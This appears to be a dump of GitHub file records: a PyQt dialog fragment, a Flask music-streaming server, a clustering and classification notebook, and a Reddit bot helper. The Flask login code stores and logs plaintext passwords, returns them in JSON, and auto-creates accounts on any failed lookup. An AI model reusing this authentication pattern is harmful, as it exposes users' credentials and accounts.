0))\n self.edit_number.setMaximumSize(QtCore.QSize(110, 16777215))\n self.edit_number.setObjectName(\"edit_number\")\n self.formLayout.setWidget(3, QtWidgets.QFormLayout.FieldRole, self.edit_number)\n self.check_waiver = QtWidgets.QCheckBox(member_mod)\n self.check_waiver.setText(\"\")\n self.check_waiver.setObjectName(\"check_waiver\")\n self.formLayout.setWidget(4, QtWidgets.QFormLayout.FieldRole, self.check_waiver)\n self.check_truck = QtWidgets.QCheckBox(member_mod)\n self.check_truck.setText(\"\")\n self.check_truck.setObjectName(\"check_truck\")\n self.formLayout.setWidget(5, QtWidgets.QFormLayout.FieldRole, self.check_truck)\n self.label_trailer = QtWidgets.QLabel(member_mod)\n font = QtGui.QFont()\n font.setPointSize(10)\n self.label_trailer.setFont(font)\n self.label_trailer.setObjectName(\"label_trailer\")\n self.formLayout.setWidget(6, QtWidgets.QFormLayout.LabelRole, self.label_trailer)\n self.check_trailer = QtWidgets.QCheckBox(member_mod)\n self.check_trailer.setText(\"\")\n self.check_trailer.setObjectName(\"check_trailer\")\n self.formLayout.setWidget(6, QtWidgets.QFormLayout.FieldRole, self.check_trailer)\n self.edit_id = QtWidgets.QLineEdit(member_mod)\n sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Fixed, QtWidgets.QSizePolicy.Fixed)\n sizePolicy.setHorizontalStretch(0)\n sizePolicy.setVerticalStretch(0)\n sizePolicy.setHeightForWidth(self.edit_id.sizePolicy().hasHeightForWidth())\n self.edit_id.setSizePolicy(sizePolicy)\n self.edit_id.setMinimumSize(QtCore.QSize(0, 0))\n self.edit_id.setMaximumSize(QtCore.QSize(25, 16777215))\n self.edit_id.setStyleSheet(\"\")\n self.edit_id.setText(\"\")\n self.edit_id.setAlignment(QtCore.Qt.AlignCenter)\n self.edit_id.setObjectName(\"edit_id\")\n 
self.formLayout.setWidget(0, QtWidgets.QFormLayout.FieldRole, self.edit_id)\n self.gridLayout.addLayout(self.formLayout, 0, 0, 1, 1)\n self.buttonBox = QtWidgets.QDialogButtonBox(member_mod)\n self.buttonBox.setOrientation(QtCore.Qt.Horizontal)\n self.buttonBox.setStandardButtons(QtWidgets.QDialogButtonBox.Cancel|QtWidgets.QDialogButtonBox.Save)\n self.buttonBox.setObjectName(\"buttonBox\")\n self.gridLayout.addWidget(self.buttonBox, 1, 0, 1, 1)\n\n self.retranslateUi(member_mod)\n QtCore.QMetaObject.connectSlotsByName(member_mod)\n member_mod.setTabOrder(self.edit_id, self.edit_first_name)\n member_mod.setTabOrder(self.edit_first_name, self.edit_last_name)\n member_mod.setTabOrder(self.edit_last_name, self.edit_number)\n member_mod.setTabOrder(self.edit_number, self.check_waiver)\n member_mod.setTabOrder(self.check_waiver, self.check_truck)\n member_mod.setTabOrder(self.check_truck, self.check_trailer)\n\n def retranslateUi(self, member_mod):\n _translate = QtCore.QCoreApplication.translate\n member_mod.setWindowTitle(_translate(\"member_mod\", \"Dialog\"))\n self.label_id.setText(_translate(\"member_mod\", \"Member ID\"))\n self.label_first_name.setText(_translate(\"member_mod\", \"First Name\"))\n self.label_last_name.setText(_translate(\"member_mod\", \"Last Name\"))\n self.label_number.setText(_translate(\"member_mod\", \"Cell #\"))\n self.label_waiver.setText(_translate(\"member_mod\", \"Waiver Signed\"))\n self.label_truck.setText(_translate(\"member_mod\", \"Truck Cert\"))\n self.label_trailer.setText(_translate(\"member_mod\", \"Trailer Cert\"))\n\n" } ]
4
SoundOutOrganization/Server
https://github.com/SoundOutOrganization/Server
acdfabbdd01de378a41c52343812666678a9a6e8
66b41e8318e288841d0c049602beac6fcc287ec7
262e5b4fc36a4f6eeaa3ec9b58efd53b0dd40d71
refs/heads/master
2023-01-23T11:34:24.233130
2020-12-11T11:27:06
2020-12-11T11:27:06
317,255,922
1
2
null
null
null
null
null
[ { "alpha_fraction": 0.6366071701049805, "alphanum_fraction": 0.6366071701049805, "avg_line_length": 45.70833206176758, "blob_id": "fcc24333cfa5fd5aecfa7877de46164eccdbe0d8", "content_id": "bd219fb71c7d6cf1f41bba6b337882e0cefdcdf7", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1120, "license_type": "no_license", "max_line_length": 77, "num_lines": 24, "path": "/auth.py", "repo_name": "SoundOutOrganization/Server", "src_encoding": "UTF-8", "text": "from flask import render_template, redirect, url_for, request, flash, jsonify\nfrom flask_login import login_user, logout_user, login_required\nfrom init import Users\n#from werkzeug.security import generate_password_hash, check_password_hash\n\ndef login_gest(username, password, db):\n test_user = Users.query.filter_by(user=username).first()\n print (\"tesdzdzdzdzdzdzdzdzdzdzdzdzdzdzdzdzdzdzdz\")\n if(test_user != None):\n print(test_user.user,\"-> [USER EXIST]\", flush=True)\n if(test_user.passw != password):\n print(password,\"-> [INCORRECT PASSWORD]\", flush=True)\n return(\"FAILURE\")\n elif(test_user.passw == password):\n print(\"[CONNECTION OK]\", flush=True)\n value = {'username': test_user.user, 'password': test_user.passw}\n return (jsonify(value))\n elif(test_user == None):\n new_user = Users(user=username, passw=password)\n db.session.add(new_user)\n db.session.commit()\n print(new_user.user,\"-> [USER CREATED]\\n[CONNECTION OK]\", flush=True)\n value = {'username': new_user.user, 'password': new_user.passw}\n return (jsonify(value))" }, { "alpha_fraction": 0.5989702343940735, "alphanum_fraction": 0.6135583519935608, "avg_line_length": 30.790908813476562, "blob_id": "e6a9ecf46c5859e14834a7b6145153706b1712e1", "content_id": "0853269c481779d7304dc6f52f6348e04f8e884c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3496, "license_type": "no_license", "max_line_length": 139, "num_lines": 110, "path": "/app.py", "repo_name": "SoundOutOrganization/Server", "src_encoding": "UTF-8", "text": "from flask import Flask,render_template, Response, jsonify, redirect\nimport sys\nimport flask\nfrom init import *\nfrom auth import *\nfrom debug import init_logs_formatting\nfrom werkzeug.utils import secure_filename\nfrom werkzeug.datastructures import FileStorage\nimport logging\nimport json\nimport os\ninit_logs_formatting()\napp, db= create_app()\napp.config['UPLOAD_PATH'] = 'music'\n#app.config['MAX_CONTENT_PATH']\napp.config['UPLOAD_EXTENSIONS'] = ['.mp3', '.wav'] #if file_ext not in current_app.config['UPLOAD_EXTENSIONS']:abort(400)\n\n#add music to db\[email protected]('/addmusic')\ndef template_addmusic():\n return render_template('addmusic.html')\n\[email protected]('/addmusic', methods=['POST'])\ndef test_music_db():\n genre = request.form.get('genre')\n title = request.form.get('title')\n author = request.form.get('author')\n uploaded_file = request.files['file']\n filename = secure_filename(uploaded_file.filename)\n if filename != '':\n file_ext = os.path.splitext(filename)[1]\n file_name = os.path.splitext(filename)[0]\n if file_ext not in app.config['UPLOAD_EXTENSIONS']:\n print(\"test\")\n else:\n new_single = Musics(genre=genre, title=title, author=author, link=\"music/\"+ file_name + file_ext)\n db.session.add(new_single)\n db.session.commit()\n uploaded_file.save(os.path.join(app.config['UPLOAD_PATH'], filename))\n\n return redirect(\"http://localhost:5000/addmusic\", code=302)\n\ndef get_musics_dict():\n x = 1\n 
value = []\n while(x <= Musics.query.count()):\n new_single = Musics.query.get(x)\n print (x)\n value.append({'id': x, 'genre': new_single.genre, 'title': new_single.title, 'author': new_single.author, 'link': new_single.link})\n x +=1\n return (value)\n\n#Route to render GUI\n\[email protected]('/musics')\ndef get_musics_route():\n x = 1\n value = []\n while(x <= Musics.query.count()):\n new_single = Musics.query.get(x)\n print (x)\n value.append({'id': x, 'genre': new_single.genre, 'title': new_single.title, 'author': new_single.author, 'link': new_single.link})\n x +=1\n return (jsonify(value))\n\[email protected]('/login')\ndef login():\n return render_template('login.html')\n\[email protected]('/login', methods=['POST'])\ndef handle_login_data():\n username = request.form.get('username')\n password = request.form.get('password')\n x = login_gest(username, password, db)\n #print(x)\n if x == \"FAILURE\":\n return render_template('login.html')\n else :\n return redirect(\"http://localhost:5000/addmusic\", code=302)\n\n#Route to stream music\[email protected]('/play/<int:stream_id>')\ndef streammp3(stream_id):\n def generate():\n data = get_musics_dict()\n count = 1\n for item in data:\n print(item['id'])\n if item['id'] == stream_id:\n song = item['link']\n with open(song, \"rb\") as fwav:\n data = fwav.read(1024)\n while data:\n yield data\n data = fwav.read(1024)\n logging.debug('Music data fragment : ' + str(count))\n count += 1\n\n return Response(generate(), mimetype=\"audio/mp3\")\n\[email protected]('/')\ndef main_route():\n return redirect(\"http://localhost:5000/login\", code=302)\n\n#launch a Tornado server with HTTPServer.\nif __name__ == \"__main__\":\n port = 5000\n db.create_all() \n logging.debug(\"Started Server on port : \" + str(port))\n app.run(host='0.0.0.0')" }, { "alpha_fraction": 0.8666666746139526, "alphanum_fraction": 0.8666666746139526, "avg_line_length": 9, "blob_id": "363071143a404f5f7af4b4dfbf2ad63757ea1cc3", "content_id": "e4dd52d70f75186c12e5a38c17f6501e17e0d02f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Text", "length_bytes": 90, "license_type": "no_license", "max_line_length": 16, "num_lines": 9, "path": "/requirements.txt", "repo_name": "SoundOutOrganization/Server", "src_encoding": "UTF-8", "text": "Flask\nflask_login\ntornado\nflask_sqlalchemy\npyopenssl\nWerkzeug\nrequests\njsonify\nflask-cors\n" }, { "alpha_fraction": 0.6559378504753113, "alphanum_fraction": 0.677025556564331, "avg_line_length": 25.5, "blob_id": "c3c8f73901e55c99ace0aefd4e592015c4196b9d", "content_id": "70399f248bf98b8484a389aaaec404a59a35ae2a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 901, "license_type": "no_license", "max_line_length": 68, "num_lines": 34, "path": "/init.py", "repo_name": "SoundOutOrganization/Server", "src_encoding": "UTF-8", "text": "import flask\nfrom flask_sqlalchemy import SQLAlchemy\nfrom flask_cors import CORS\n\n# Initialize Flask.\napp = flask.Flask(__name__)\napp.config['SQLALCHEMY_DATABASE_URI'] = 'sqlite:///./server.sqlite3'\napp.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = True\nCORS(app)\ndb = SQLAlchemy(app)\n\nclass Musics(db.Model):\n id = db.Column('id', db.Integer, primary_key = True)\n genre = db.Column(db.String(100))\n title = db.Column(db.String(100))\n author = db.Column(db.String(100))\n link = db.Column(db.String(100))\n\nclass Users(db.Model):\n id = db.Column('id', db.Integer, primary_key = True)\n user = db.Column(db.String(100))\n 
passw = db.Column(db.String(100))\n\ndef create_app():\n return(app, db)\n" } ]
4
hedayush97/Classification
https://github.com/hedayush97/Classification
40f444a86d84961e5bfb493c7024a02eadf204b7
a1654bc8d6fc475379b6964cde67bfcfe26fd596
c4466bc5a9fbbbb87a1345c4ce414268f016578c
refs/heads/main
2023-05-01T19:43:54.363418
2021-05-22T14:26:17
2021-05-22T14:26:17
369,826,785
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.6222524642944336, "alphanum_fraction": 0.6499606370925903, "avg_line_length": 14.693258285522461, "blob_id": "ef54715a940bd58e3f0033c54f44d0ce6988a49d", "content_id": "4d8317c24a9163c381ed1523735eb0ce677cdd6e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 13967, "license_type": "no_license", "max_line_length": 342, "num_lines": 890, "path": "/AyushHeda_10-04-2021.py", "repo_name": "hedayush97/Classification", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# coding: utf-8\n\n# # Problem 1 Clustering\n# ## A leading bank wants to develop a customer segmentation to give promotional offers to its customers. They collected a sample that summarizes the activities of users during the past few months. You are given the task to identify the segments based on credit card usage.\n\n# In[1]:\n\n\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport seaborn as sns\n\nfrom sklearn.preprocessing import StandardScaler\n\nimport matplotlib.pyplot as plt\nimport seaborn as sns\n\nfrom scipy.cluster.hierarchy import dendrogram, linkage\nfrom scipy.cluster.hierarchy import fcluster\n\nfrom sklearn.cluster import KMeans \n\nfrom sklearn.tree import DecisionTreeClassifier\nfrom sklearn.ensemble import RandomForestClassifier\nfrom sklearn.neural_network import MLPClassifier\n\nfrom sklearn.metrics import accuracy_score\nfrom sklearn.metrics import classification_report,confusion_matrix\n\n\n# In[2]:\n\n\ndf = pd.read_csv(\"bank_marketing_part1_Data.csv\")\n\n\n# In[3]:\n\n\ndf.head()\n\n\n# In[4]:\n\n\ndf.info()\n\n\n# In[5]:\n\n\ndf.isnull().sum()\n\n\n# # Checking Summary Statistics\n\n# In[6]:\n\n\ndf.describe()\n\n\n# # Checking for duplicates in the data\n\n# In[7]:\n\n\ndf.duplicated().sum()\n\n\n# #### There are no duplicates in the dataset\n\n# In[8]:\n\n\ndf.head()\n\n\n# # Ques 1\n\n# ### Univariate, bivariate and multivariate analysis\n\n# In[9]:\n\n\nplt.figure(figsize = (20,10))\nsns.boxplot(data = df)\nplt.show()\n\n\n# In[10]:\n\n\nsns.pairplot(df)\nplt.show()\n\n\n# In[11]:\n\n\nplt.figure(figsize=(10, 8))\ncorr = df.corr()\nsns.heatmap(corr, annot = True)\nplt.show()\n\n\n# In[12]:\n\n\ndef univariateAnalysis_numeric(column,nbins):\n print(\"Description of \" + column)\n print(\"----------------------------------------------------------------------------\")\n print(df[column].describe(),end=' ')\n \n \n plt.figure()\n print(\"Distribution of \" + column)\n print(\"----------------------------------------------------------------------------\")\n sns.distplot(df[column], kde=True, color = 'g');\n plt.show()\n \n plt.figure()\n print(\"BoxPlot of \" + column)\n print(\"----------------------------------------------------------------------------\")\n sns.boxplot(x = df[column])\n plt.show()\n\n\n# In[13]:\n\n\ndf_num = df.select_dtypes(include = ['float64', 'int64'])\nlstnumericcolumns = list(df_num.columns.values)\nlen(lstnumericcolumns)\n\n\n# In[14]:\n\n\nfor x in lstnumericcolumns:\n univariateAnalysis_numeric(x,20)\n\n\n# # Scaling the Data\n\n# In[15]:\n\n\nX = StandardScaler()\nscaled_df = pd.DataFrame(X.fit_transform(df.iloc[:,1:7]), columns = df.columns[1:])\n\n\n# In[16]:\n\n\nscaled_df.head()\n\n\n# In[17]:\n\n\nwardlink = linkage(scaled_df, method = 'ward')\n\n\n# In[18]:\n\n\nplt.figure(figsize=(10, 5))\ndend = dendrogram(wardlink)\nplt.show()\n\n\n# In[19]:\n\n\ndend = dendrogram(wardlink,\n truncate_mode = 'lastp',\n p = 8,\n )\n\n\n# In[20]:\n\n\nclusters = 
fcluster(wardlink, 3, criterion='maxclust')\nclusters\n\n\n# In[21]:\n\n\ndf['clusters'] = clusters\n\n\n# In[22]:\n\n\ndf.clusters.value_counts().sort_index()\n\n\n# # Cluster Profiling\n\n# In[23]:\n\n\naggdata=df.iloc[:,1:8].groupby('clusters').mean()\naggdata['Freq']=df.clusters.value_counts().sort_index()\naggdata\n\n\n# In[24]:\n\n\ndf.head()\n\n\n# # K - Means\n# ## Creating Clusters using KMeans\n\n# In[25]:\n\n\nk_means = KMeans(n_clusters = 3,random_state = 0)\n\n\n# In[26]:\n\n\nk_means.fit(scaled_df)\n\n\n# # Cluster Output for all the observations\n\n# In[27]:\n\n\nk_means.labels_\n\n\n# In[28]:\n\n\nk_means.inertia_\n\n\n# # Calculating WSS for other values of K - Elbow Method\n\n# In[29]:\n\n\nwss = []\n\n\n# In[30]:\n\n\nfor i in range(1,11):\n KM = KMeans(n_clusters = i, random_state = 1)\n KM.fit(scaled_df)\n wss.append(KM.inertia_)\n\n\n# In[31]:\n\n\nwss\n\n\n# In[32]:\n\n\na=[1,2,3,4,5,6,7,8,9,10]\n\n\n# In[33]:\n\n\nsns.pointplot(a, wss)\nplt.show()\n\n\n# # KMeans with K=2\n\n# In[34]:\n\n\nk_means = KMeans(n_clusters = 2,random_state=0)\nk_means.fit(scaled_df)\nlabels = k_means.labels_\n\n\n# # Cluster evaluation for 2 clusters: the silhouette score\n\n# In[35]:\n\n\nfrom sklearn.metrics import silhouette_samples, silhouette_score\n\n\n# In[36]:\n\n\nsilhouette_score(scaled_df,labels,random_state=0)\n\n\n# In[37]:\n\n\ndf[\"Clus_kmeans4\"] = labels\ndf.head()\n\n\n# # Cluster Profiling\n\n# In[38]:\n\n\ndf.Clus_kmeans4.value_counts().sort_index()\n\n\n# In[39]:\n\n\nclust_profile = df.groupby('Clus_kmeans4').mean()\nclust_profile['freq'] = df.Clus_kmeans4.value_counts().sort_index()\nclust_profile.T\n\n\n# # Problem 2 CART-RF-ANN\n# ## An Insurance firm providing tour insurance is facing higher claim frequency. The management decides to collect data from the past few years. You are assigned the task to make a model which predicts the claim status and provide recommendations to management. 
Use CART, RF & ANN and compare the models' performances in train and test sets.\n\n# # CART\n\n# In[40]:\n\n\ndataset = pd.read_csv(\"insurance_part2_data.csv\")\n\n\n# In[41]:\n\n\ndataset.head()\n\n\n# In[42]:\n\n\ndataset.describe()\n\n\n# In[43]:\n\n\ndataset.shape\n\n\n# In[44]:\n\n\ndataset.info()\n\n\n# In[45]:\n\n\ndataset.isnull().sum()\n\n\n# In[46]:\n\n\nplt.figure(figsize = (20,8))\nsns.boxplot(data = dataset)\nplt.show()\n\n\n# In[47]:\n\n\ndef univariateAnalysis_numeric(column,nbins):\n print(\"Description of \" + column)\n print(\"----------------------------------------------------------------------------\")\n print(dataset[column].describe(),end=' ')\n \n \n plt.figure()\n print(\"Distribution of \" + column)\n print(\"----------------------------------------------------------------------------\")\n sns.distplot(dataset[column], kde=True, color = 'g');\n plt.show()\n \n plt.figure()\n \n print(\"BoxPlot of \" + column)\n print(\"----------------------------------------------------------------------------\")\n sns.boxplot(x = dataset[column])\n plt.show()\n\n\n# In[48]:\n\n\ndataset_num = dataset.select_dtypes(include = ['float64', 'int64'])\nlstnumericcolumns = list(dataset_num.columns.values)\nlen(lstnumericcolumns)\n\n\n# In[49]:\n\n\nfor x in lstnumericcolumns:\n univariateAnalysis_numeric(x,10)\n\n\n# In[50]:\n\n\nsns.pairplot(dataset)\nplt.show()\n\n\n# In[51]:\n\n\nplt.figure(figsize=(10, 8))\ncorr = dataset.corr()\nsns.heatmap(corr, annot = True)\nplt.show()\n\n\n# In[52]:\n\n\nfor feature in dataset.columns: \n if dataset[feature].dtype == 'object': \n dataset[feature] = pd.Categorical(dataset[feature]).codes\n\n\n# In[53]:\n\n\nX = dataset.drop(\"Claimed\", axis=1)\ny = dataset.pop(\"Claimed\")\n\n\n# In[54]:\n\n\nfrom sklearn.model_selection import train_test_split\n\nX_train, X_test, train_labels, test_labels = train_test_split(X, y, test_size=0.20, random_state = 0)\n\n\n# In[55]:\n\n\ndt_model = DecisionTreeClassifier(criterion = 'gini', random_state = 0)\n\n\n# In[56]:\n\n\ndt_model.fit(X_train, train_labels)\n\n\n# In[57]:\n\n\nfrom sklearn import tree\n\ntrain_char_label = ['No', 'Yes']\nTree_File = open('dataset_tree.dot','w')\ndot_data = tree.export_graphviz(dt_model, out_file=Tree_File, feature_names = list(X_train), class_names = list(train_char_label))\n\nTree_File.close()\n\n\n# In[58]:\n\n\nprint (pd.DataFrame(dt_model.feature_importances_, columns = [\"Imp\"], index = X_train.columns))\n\n\n# In[59]:\n\n\ny_predict = dt_model.predict(X_test)\n\n\n# # Regularizing the Decision Tree\n\n# In[60]:\n\n\nreg_dt_model = DecisionTreeClassifier(criterion = 'gini', max_depth = 7,min_samples_leaf=10,min_samples_split=30)\nreg_dt_model.fit(X_train, train_labels)\n\n\n# In[61]:\n\n\ntree_regularized = open('tree_regularized.dot','w')\ndot_data = tree.export_graphviz(reg_dt_model, out_file= tree_regularized , feature_names = list(X_train), class_names = list(train_char_label))\n\ntree_regularized.close()\n\nprint (pd.DataFrame(dt_model.feature_importances_, columns = [\"Imp\"], index = X_train.columns))\n\n\n# In[62]:\n\n\nytrain_predict = reg_dt_model.predict(X_train)\nytest_predict = reg_dt_model.predict(X_test)\n\n\n# In[63]:\n\n\n# AUC and ROC for the training data\n\n# predict probabilities\nprobs = reg_dt_model.predict_proba(X_train)\n# keep probabilities for the positive outcome only\nprobs = probs[:, 1]\n# calculate AUC\nfrom sklearn.metrics import roc_auc_score\nauc = roc_auc_score(train_labels, probs)\nprint('AUC: %.3f' % auc)\n# calculate roc 
curve\nfrom sklearn.metrics import roc_curve\nfpr, tpr, thresholds = roc_curve(train_labels, probs)\nplt.plot([0, 1], [0, 1], linestyle='--')\n# plot the roc curve for the model\nplt.plot(fpr, tpr, marker='.')\n# show the plot\nplt.show()\n\n\n# In[64]:\n\n\n# AUC and ROC for the test data\n\n\n# predict probabilities\nprobs = reg_dt_model.predict_proba(X_test)\n# keep probabilities for the positive outcome only\nprobs = probs[:, 1]\n# calculate AUC\nfrom sklearn.metrics import roc_auc_score\nauc = roc_auc_score(test_labels, probs)\nprint('AUC: %.3f' % auc)\n# calculate roc curve\nfrom sklearn.metrics import roc_curve\nfpr, tpr, thresholds = roc_curve(test_labels, probs)\nplt.plot([0, 1], [0, 1], linestyle='--')\n# plot the roc curve for the model\nplt.plot(fpr, tpr, marker='.')\n# show the plot\nplt.show()\n\n\n# In[65]:\n\n\nprint(classification_report(train_labels, ytrain_predict))\n\n\n# In[66]:\n\n\nconfusion_matrix(train_labels, ytrain_predict)\n\n\n# In[67]:\n\n\nreg_dt_model.score(X_train,train_labels)\n\n\n# In[68]:\n\n\nprint(classification_report(test_labels, ytest_predict))\n\n\n# In[69]:\n\n\nconfusion_matrix(test_labels, ytest_predict)\n\n\n# In[70]:\n\n\nreg_dt_model.score(X_test,test_labels)\n\n\n# # Random Forest\n\n# In[71]:\n\n\nrfcl = RandomForestClassifier(n_estimators = 501)\nrfcl = rfcl.fit(X_train, train_labels)\n\n\n# In[72]:\n\n\nfrom sklearn.model_selection import GridSearchCV\n\nparam_grid = {\n 'max_depth': [7, 8, 9, 10],\n 'min_samples_leaf': [15, 20, 25],\n 'min_samples_split': [45, 60, 75],\n 'n_estimators': [100, 300, 700] \n}\n\nrfcl = RandomForestClassifier()\n\ngrid_search = GridSearchCV(estimator = rfcl, param_grid = param_grid, cv = 3)\n\n\n# In[73]:\n\n\ngrid_search.fit(X_train, train_labels)\n\n\n# In[74]:\n\n\ngrid_search.best_params_\n\n\n# In[75]:\n\n\nbest_grid = grid_search.best_estimator_\n\n\n# In[76]:\n\n\nytrain_predict = best_grid.predict(X_train)\nytest_predict = best_grid.predict(X_test)\n\n\n# In[77]:\n\n\ngrid_search.score(X_train,train_labels)\n\n\n# In[78]:\n\n\nconfusion_matrix(train_labels,ytrain_predict)\n\n\n# In[79]:\n\n\nprint(classification_report(train_labels,ytrain_predict))\n\n\n# In[80]:\n\n\nprint(classification_report(test_labels,ytest_predict))\n\n\n# In[81]:\n\n\nconfusion_matrix(test_labels,ytest_predict)\n\n\n# In[82]:\n\n\ngrid_search.score(X_test, test_labels)\n\n\n# In[83]:\n\n\n# AUC and ROC for the training data\n\n# predict probabilities\nprobs = best_grid.predict_proba(X_train)\n# keep probabilities for the positive outcome only\nprobs = probs[:, 1]\n# calculate AUC\nfrom sklearn.metrics import roc_auc_score\nauc = roc_auc_score(train_labels, probs)\nprint('AUC: %.3f' % auc)\n# calculate roc curve\nfrom sklearn.metrics import roc_curve\nfpr, tpr, thresholds = roc_curve(train_labels, probs)\nplt.plot([0, 1], [0, 1], linestyle='--')\n# plot the roc curve for the model\nplt.plot(fpr, tpr, marker='.')\n# show the plot\nplt.show()\n\n\n# In[84]:\n\n\n# AUC and ROC for the test data\n\n\n# predict probabilities\nprobs = best_grid.predict_proba(X_test)\n# keep probabilities for the positive outcome only\nprobs = probs[:, 1]\n# calculate AUC\nfrom sklearn.metrics import roc_auc_score\nauc = roc_auc_score(test_labels, probs)\nprint('AUC: %.3f' % auc)\n# calculate roc curve\nfrom sklearn.metrics import roc_curve\nfpr, tpr, thresholds = roc_curve(test_labels, probs)\nplt.plot([0, 1], [0, 1], linestyle='--')\n# plot the roc curve for the model\nplt.plot(fpr, tpr, marker='.')\n# show the plot\nplt.show()\n\n\n# # ANN\n\n# 
In[85]:\n\n\nX_train, X_test, y_train, y_test = train_test_split(X, y, test_size = 0.2, random_state = 1)\n\n\n# In[86]:\n\n\nsc = StandardScaler() \nX_trains = sc.fit_transform(X_train) \nX_tests = sc.transform (X_test)\n\n\n# In[87]:\n\n\nclf = MLPClassifier(hidden_layer_sizes = 100, max_iter = 5000,\n                    solver='lbfgs', verbose = True, random_state = 0, tol = 0.01)\nclf.fit(X_train, y_train)\n\n\n# In[88]:\n\n\ny_pred = clf.predict(X_test)\n\n\n# In[89]:\n\n\naccuracy_score(y_test, y_pred) * 100\n\n\n# In[90]:\n\n\nparam_grid = {\n    'hidden_layer_sizes': [(100,200,300)],\n    'activation': ['logistic', 'relu'],\n    'solver': ['sgd', 'adam'],\n    'tol': [0.1,0.001,0.0001],\n    'max_iter' : [10000]\n}\n\nrfcl = MLPClassifier()\n\ngrid_search = GridSearchCV(estimator = rfcl, param_grid = param_grid, cv = 3)\n\n\n# In[91]:\n\n\n# note: labels must come from the same split as X_trains (random_state = 1)\ngrid_search.fit(X_trains, y_train)\n\n\n# In[92]:\n\n\ngrid_search.best_params_\n\n\n# In[93]:\n\n\nbest_grid = grid_search.best_estimator_\n\n\n# In[94]:\n\n\nytrain_predict = best_grid.predict(X_trains)\nytest_predict = best_grid.predict(X_tests)\n\n\n# In[95]:\n\n\nconfusion_matrix(y_train,ytrain_predict)\n\n\n# In[96]:\n\n\nprint(classification_report(y_train,ytrain_predict))\n\n\n# In[97]:\n\n\n# AUC and ROC for the training data\n\n# predict probabilities (on the scaled data the model was fit on)\nprobs = best_grid.predict_proba(X_trains)\n# keep probabilities for the positive outcome only\nprobs = probs[:, 1]\n# calculate AUC\nfrom sklearn.metrics import roc_auc_score\nauc = roc_auc_score(y_train, probs)\nprint('AUC: %.3f' % auc)\n# calculate roc curve\nfrom sklearn.metrics import roc_curve\nfpr, tpr, thresholds = roc_curve(y_train, probs)\nplt.plot([0, 1], [0, 1], linestyle='--')\n# plot the roc curve for the model\nplt.plot(fpr, tpr, marker='.')\n# show the plot\nplt.show()\n\n\n# In[98]:\n\n\naccuracy_score(y_test, ytest_predict) * 100\n\n\n# In[99]:\n\n\nconfusion_matrix(y_test,ytest_predict)\n\n\n# In[100]:\n\n\nprint(classification_report(y_test,ytest_predict))\n\n\n# In[101]:\n\n\n# AUC and ROC for the test data\n\n# predict probabilities (on the scaled data the model was fit on)\nprobs = best_grid.predict_proba(X_tests)\n# keep probabilities for the positive outcome only\nprobs = probs[:, 1]\n# calculate AUC\nfrom sklearn.metrics import roc_auc_score\nauc = roc_auc_score(y_test, probs)\nprint('AUC: %.3f' % auc)\n# calculate roc curve\nfrom sklearn.metrics import roc_curve\nfpr, tpr, thresholds = roc_curve(y_test, probs)\nplt.plot([0, 1], [0, 1], linestyle='--')\n# plot the roc curve for the model\nplt.plot(fpr, tpr, marker='.')\n# show the plot\nplt.show()\n\n\n# # END\n" } ]
1
Lyxpudox/Dose_of_Sunshine
https://github.com/Lyxpudox/Dose_of_Sunshine
54a3b910883c55300434e09f183546edd5d4f41c
373020089a86939c4d8ce643a854469ae12843d0
634231992c564d79e4abc62ab67abee213f7fada
refs/heads/master
2020-02-26T23:09:44.941086
2017-08-22T17:22:04
2017-08-22T17:22:04
100,890,474
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.640191912651062, "alphanum_fraction": 0.6415244936943054, "avg_line_length": 36.28571319580078, "blob_id": "e74dca4140cb9279ee0e37a395c77eaf4dfc1e05", "content_id": "4b72f8aaceebb102eceef598875100c350e5089e", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3752, "license_type": "permissive", "max_line_length": 133, "num_lines": 98, "path": "/helpers.py", "repo_name": "Lyxpudox/Dose_of_Sunshine", "src_encoding": "UTF-8", "text": "from random import choice, sample\r\n\r\nfrom prawcore.exceptions import NotFound\r\n\r\nfrom models import User\r\n\r\ndef check_subreddits(reddit, subs):\r\n '''\r\n Modified code from /u/gavin19 https://www.reddit.com/r/redditdev/comments/68dhpm/praw_best_way_to_check_if_subreddit_exists_from/\r\n Checks to see if all subreddits within the given list exists.\r\n '''\r\n exists = True\r\n\r\n for sub in subs:\r\n try:\r\n reddit.subreddits.search_by_name(sub, exact = True)\r\n except NotFound:\r\n exists = False\r\n break\r\n\r\n return exists\r\n\r\ndef choose_top_posts(reddit, user, limit):\r\n '''\r\n Chooses three top posts from a user's subscriptions.\r\n Returns a list of posts formatted in Markup with a url and title.\r\n '''\r\n subs = User.select().where(User.username == user).first().subs.split(\" \")\r\n # If there are three or less subreddits, combine the subreddits with a plus\r\n combined_subs = \"+\".join(subs)\r\n images = []\r\n\r\n # If the number of subs is less than or equal to three\r\n if len(subs) <= limit:\r\n # Get the top three hot posts of the combined subreddits and append to images\r\n # Will also exclude sticky posts\r\n post_gen = [submission for submission in reddit.subreddit(combined_subs).hot(limit = limit) if not submission.stickied]\r\n for post in post_gen:\r\n images.append(\"\\n[{}]({})\\n\".format(post.title, post.url))\r\n # Else, choose three subreddits from the user's subscriptions and get a hot post from each\r\n else:\r\n chosen_subs = sample(subs, limit)\r\n for sub in chosen_subs:\r\n post = next(reddit.subreddit(sub).hot(limit = 1))\r\n images.append(\"\\n[{}]({})\\n\".format(post.title, post.url))\r\n\r\n return images\r\n\r\ndef concat_subreddits(user, code):\r\n '''\r\n Taking a user as input, get the first user that appears from the database. Will then get\r\n all subreddits that the user is subscribed to, and will format to show as a list on Reddit.\r\n '''\r\n subs = User.select().where(User.username == user).first().subs.split(\" \")\r\n subs_split = [\" * {}\\n\".format(sub) for sub in subs]\r\n return code + \"\".join(subs_split)\r\n\r\ndef get_unique_subreddits(user, requested):\r\n '''\r\n Gets the user's current subreddits and compares it to a list of subreddits\r\n that they wish to subscribe to. Returns a string of new subreddits.\r\n Extra space at the beginning of string to separate from previous 